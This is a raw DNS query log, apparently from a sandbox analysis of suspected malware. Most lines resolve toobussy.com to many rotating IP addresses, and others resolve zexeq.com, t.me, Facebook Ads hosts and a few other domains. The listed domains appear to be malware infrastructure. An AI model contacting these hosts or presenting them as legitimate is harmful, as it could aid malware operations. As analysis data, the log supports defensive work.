                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.035729885 CEST8.8.8.8192.168.2.30xbebfNo error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.543556929 CEST8.8.8.8192.168.2.30xf4f1No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.479723930 CEST8.8.8.8192.168.2.30x7fNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.909862995 CEST8.8.8.8192.168.2.30x89c9No error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.201472044 CEST8.8.8.8192.168.2.30xc813No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.590174913 CEST8.8.8.8192.168.2.30xea73No error (0)adsmanager.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.590174913 CEST8.8.8.8192.168.2.30xea73No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.590174913 CEST8.8.8.8192.168.2.30xea73No error (0)star.c10r.facebook.com157.240.17.17A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.185162067 CEST8.8.8.8192.168.2.30x72a9No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.185162067 CEST8.8.8.8192.168.2.30x72a9No error (0)star-mini.c10r.facebook.com157.240.9.35A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.495310068 CEST8.8.8.8192.168.2.30x5905No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:33.652901888 CEST8.8.8.8192.168.2.30x4431No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.496217012 CEST8.8.8.8192.168.2.30x75e7No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:36.019514084 CEST8.8.8.8192.168.2.30x64e9No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.228518963 CEST8.8.8.8192.168.2.30x6cddNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.259345055 CEST8.8.8.8192.168.2.30x5481No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:38.797343016 CEST8.8.8.8192.168.2.30xa202No error (0)shsplatform.co.uk80.66.203.53A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.436762094 CEST8.8.8.8192.168.2.30xa76cNo error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.787662029 CEST8.8.8.8192.168.2.30xcb14No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.306963921 CEST8.8.8.8192.168.2.30xed1cNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.700331926 CEST8.8.8.8192.168.2.30xd5a1No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.234476089 CEST8.8.8.8192.168.2.30xba0aNo error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.761905909 CEST8.8.8.8192.168.2.30x8d9dNo error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.985579014 CEST8.8.8.8192.168.2.30xef30No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:47.364337921 CEST8.8.8.8192.168.2.30xb441No error (0)adsmanager.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:47.364337921 CEST8.8.8.8192.168.2.30xb441No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:47.364337921 CEST8.8.8.8192.168.2.30xb441No error (0)star.c10r.facebook.com157.240.17.17A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:47.384660006 CEST8.8.8.8192.168.2.30x6476No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:47.877331018 CEST8.8.8.8192.168.2.30xaa8dNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:47.877331018 CEST8.8.8.8192.168.2.30xaa8dNo error (0)star-mini.c10r.facebook.com157.240.9.35A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.646327019 CEST8.8.8.8192.168.2.30xfe12No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.074316025 CEST8.8.8.8192.168.2.30x6bb1No error (0)ss.apjeoighw.com154.221.31.191A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.150230885 CEST8.8.8.8192.168.2.30x2973No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
